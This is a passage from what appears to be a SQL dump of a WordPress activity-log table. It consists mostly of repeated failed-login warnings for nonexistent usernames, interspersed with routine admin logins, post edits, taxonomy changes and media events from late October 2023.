exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40175,'2023-10-27 11:14:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40176,'2023-10-27 11:27:22','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40177,'2023-10-27 11:34:12','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40178,'2023-10-27 11:40:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40179,'2023-10-27 11:40:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40180,'2023-10-27 11:44:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40181,'2023-10-27 11:53:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40182,'2023-10-27 11:57:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40183,'2023-10-27 12:06:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40184,'2023-10-27 12:06:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40185,'2023-10-27 12:19:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40186,'2023-10-27 12:19:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40187,'2023-10-27 12:21:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40188,'2023-10-27 12:33:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40189,'2023-10-27 12:33:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40190,'2023-10-27 12:45:25','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40191,'2023-10-27 12:46:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40192,'2023-10-27 12:57:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40193,'2023-10-27 12:59:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40194,'2023-10-27 13:01:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40195,'2023-10-27 13:09:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40196,'2023-10-27 13:12:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40197,'2023-10-27 13:25:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40198,'2023-10-27 13:29:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40199,'2023-10-27 13:32:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40200,'2023-10-27 13:32:48','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40201,'2023-10-27 13:38:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40202,'2023-10-27 13:51:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40203,'2023-10-27 13:56:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40204,'2023-10-27 13:57:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40205,'2023-10-27 14:04:45','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40206,'2023-10-27 14:10:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40207,'2023-10-27 14:17:52','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40208,'2023-10-27 14:20:53','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40209,'2023-10-27 14:25:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40210,'2023-10-27 14:31:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40211,'2023-10-27 14:44:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40212,'2023-10-27 14:44:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40213,'2023-10-27 14:54:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40214,'2023-10-27 14:57:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40215,'2023-10-27 15:02:36','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40216,'2023-10-27 15:03:43','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','9c03b4dd6456d8aa5f92ea24be2d8702','wp_user'),(40217,'2023-10-27 15:03:43','Plugin_DuplicatePost','info','Cloned \"{duplicated_post_title}\" to a new post','378197ac482bd469d22a67bab6a67b93','wp_user'),(40218,'2023-10-27 15:04:51','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','9c03b4dd6456d8aa5f92ea24be2d8702','wp_user'),(40219,'2023-10-27 15:05:28','SimplePostLogger','info','Moved {post_type} \"{post_title}\" to the trash','233e4d6f888339e97fa3c98ce7e008cd','wp_user'),(40220,'2023-10-27 15:05:41','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40221,'2023-10-27 15:05:41','Plugin_DuplicatePost','info','Cloned \"{duplicated_post_title}\" to a new post','87353443872e5785832eae143e8a5dff','wp_user'),(40222,'2023-10-27 15:08:59','SimpleCategoriesLogger','info','Added term \"{term_name}\" in taxonomy \"{term_taxonomy}\"','97896bdc53fc00f0a08869b693ff815c','wp_user'),(40223,'2023-10-27 15:09:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40224,'2023-10-27 15:09:33','SimpleCategoriesLogger','info','Edited term \"{to_term_name}\" in taxonomy \"{to_term_taxonomy}\"','aa14e14858ea387c00d61c5f4ea31759','wp_user'),(40225,'2023-10-27 15:10:39','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40226,'2023-10-27 15:11:49','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40227,'2023-10-27 15:13:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40228,'2023-10-27 15:14:26','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40229,'2023-10-27 15:15:41','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40230,'2023-10-27 15:16:01','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40231,'2023-10-27 15:17:37','SimpleCategoriesLogger','info','Edited term \"{to_term_name}\" in taxonomy \"{to_term_taxonomy}\"','8553a299418d530aad51aed86520c8b7','wp_user'),(40232,'2023-10-27 15:17:50','SimpleCategoriesLogger','info','Edited term \"{to_term_name}\" in taxonomy \"{to_term_taxonomy}\"','8553a299418d530aad51aed86520c8b7','wp_user'),(40233,'2023-10-27 15:18:56','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','7b12654a59f11ac8b4319426b14213e2','wp_user'),(40234,'2023-10-27 15:22:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40235,'2023-10-27 15:23:54','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40236,'2023-10-27 15:33:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40237,'2023-10-27 15:36:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40238,'2023-10-27 15:37:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40239,'2023-10-27 15:50:17','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40240,'2023-10-27 15:51:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40241,'2023-10-27 15:57:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40242,'2023-10-27 16:03:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40243,'2023-10-27 16:09:26','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40244,'2023-10-27 16:16:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40245,'2023-10-27 16:19:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40246,'2023-10-27 16:21:47','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40247,'2023-10-27 16:22:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40248,'2023-10-27 16:30:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40249,'2023-10-27 16:43:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40250,'2023-10-27 16:47:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40251,'2023-10-27 17:01:45','SimpleUserLogger','info','Logged in','528752c6331856c09b87588bff413d72','wp_user'),(40252,'2023-10-27 17:03:09','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40253,'2023-10-27 17:03:41','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40254,'2023-10-27 17:09:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40255,'2023-10-27 17:10:07','SimpleCategoriesLogger','info','Added term \"{term_name}\" in taxonomy \"{term_taxonomy}\"','311ca0f56fdca1b5d1dccf8802175eba','wp_user'),(40256,'2023-10-27 17:10:59','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','5c464a2ee5819d13776e32435b61f7bf','wp_user'),(40257,'2023-10-27 17:14:04','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40258,'2023-10-27 17:17:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40259,'2023-10-27 17:29:27','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','6458f0fdb5b886f37b7bb7861330d164','wp_user'),(40260,'2023-10-27 17:29:40','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40261,'2023-10-27 17:30:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40262,'2023-10-27 17:32:57','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','ebcababea37338f100e9c8ce07d88f70','wp_user'),(40263,'2023-10-27 17:33:13','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40264,'2023-10-27 17:34:38','SimpleMediaLogger','info','Created {post_type} \"{attachment_title}\"','3547adaf4a1b20961ca31dd7d3961117','wp_user'),(40265,'2023-10-27 17:34:49','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40266,'2023-10-27 17:36:07','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40267,'2023-10-27 17:37:42','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40268,'2023-10-27 17:38:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40269,'2023-10-27 17:39:30','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40270,'2023-10-27 17:41:19','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40271,'2023-10-27 17:42:11','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40272,'2023-10-27 17:42:49','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40273,'2023-10-27 17:44:24','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40274,'2023-10-27 17:45:28','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40275,'2023-10-27 17:45:56','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40276,'2023-10-27 17:46:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40277,'2023-10-27 17:50:59','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40278,'2023-10-27 17:51:28','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40279,'2023-10-27 17:51:42','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40280,'2023-10-27 18:13:44','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40281,'2023-10-27 18:14:39','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40282,'2023-10-27 18:15:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40283,'2023-10-27 18:17:59','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40284,'2023-10-27 18:19:40','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40285,'2023-10-27 18:21:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40286,'2023-10-27 18:22:22','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40287,'2023-10-27 18:23:38','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40288,'2023-10-27 18:24:48','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','c57d9e08914e522d78003d03067cb49b','wp_user'),(40289,'2023-10-27 18:32:07','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40290,'2023-10-27 18:34:21','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','2789a0e0b7824c0b348326bac118b3ec','wp_user'),(40291,'2023-10-27 18:34:21','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','2984ce3140ef1f50d32cde6524e0be88','wp_user'),(40292,'2023-10-27 18:34:21','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','50badb9744a805dc502b840eafc1805d','wp_user'),(40293,'2023-10-27 18:34:21','SimpleMediaLogger','info','Deleted {post_type} \"{attachment_title}\" (\"{attachment_filename}\")','cdd21814581447118639a5fa5a517af6','wp_user'),(40294,'2023-10-27 18:39:47','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40295,'2023-10-27 18:44:05','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40296,'2023-10-27 19:11:57','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40297,'2023-10-27 19:13:09','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40298,'2023-10-27 19:42:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40299,'2023-10-27 19:53:26','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40300,'2023-10-27 20:11:23','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40301,'2023-10-27 20:35:51','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40302,'2023-10-27 20:40:28','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40303,'2023-10-27 20:52:41','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40304,'2023-10-27 21:09:56','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40305,'2023-10-27 21:17:50','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40306,'2023-10-27 21:39:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40307,'2023-10-27 21:59:59','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40308,'2023-10-27 22:08:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40309,'2023-10-27 22:38:04','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40310,'2023-10-27 22:42:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40311,'2023-10-27 22:54:18','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40312,'2023-10-27 23:07:29','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40313,'2023-10-27 23:13:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40314,'2023-10-27 23:15:41','SimpleUserLogger','info','Logged in','1ab009c9709dbf998fe39d74d377a750','wp_user'),(40315,'2023-10-27 23:16:45','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40316,'2023-10-27 23:17:12','SimpleUserLogger','info','Logged in','528752c6331856c09b87588bff413d72','wp_user'),(40317,'2023-10-27 23:18:10','SimplePostLogger','info','Updated {post_type} \"{post_title}\"','fa8cf74d12a6c2e438fd35ac335fe71b','wp_user'),(40318,'2023-10-27 23:19:09','SimpleUserLogger','info','Logged out','e95ffe0be9e4a8872ebd35a7a9cca987','wp_user'),(40319,'2023-10-27 23:24:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40320,'2023-10-27 23:37:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40321,'2023-10-27 23:49:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40322,'2023-10-27 23:49:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40323,'2023-10-27 23:49:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40324,'2023-10-28 00:06:16','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40325,'2023-10-28 00:06:24','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40326,'2023-10-28 00:25:49','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40327,'2023-10-28 00:36:03','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40328,'2023-10-28 00:49:00','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40329,'2023-10-28 00:56:13','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40330,'2023-10-28 01:02:02','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40331,'2023-10-28 01:05:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40332,'2023-10-28 01:12:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40333,'2023-10-28 01:23:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40334,'2023-10-28 01:32:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40335,'2023-10-28 01:34:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40336,'2023-10-28 01:36:32','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40337,'2023-10-28 01:49:38','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40338,'2023-10-28 02:03:08','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40339,'2023-10-28 02:03:27','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40340,'2023-10-28 02:15:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40341,'2023-10-28 02:17:43','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40342,'2023-10-28 02:31:58','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40343,'2023-10-28 02:32:31','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40344,'2023-10-28 02:46:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40345,'2023-10-28 02:58:21','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40346,'2023-10-28 03:00:30','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40347,'2023-10-28 03:01:40','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40348,'2023-10-28 03:14:33','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40349,'2023-10-28 03:28:19','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40350,'2023-10-28 03:41:35','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40351,'2023-10-28 03:42:11','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40352,'2023-10-28 03:56:15','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40353,'2023-10-28 04:10:20','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40354,'2023-10-28 04:24:34','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40355,'2023-10-28 04:25:06','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40356,'2023-10-28 04:38:55','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40357,'2023-10-28 04:53:01','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40358,'2023-10-28 05:07:10','SimpleUserLogger','warning','Failed to login with username \"{failed_username}\" (username does not exist)','f9dcd3158d639b373b7f0870d5680ad8','web_user'),(40359,'2023-10-28 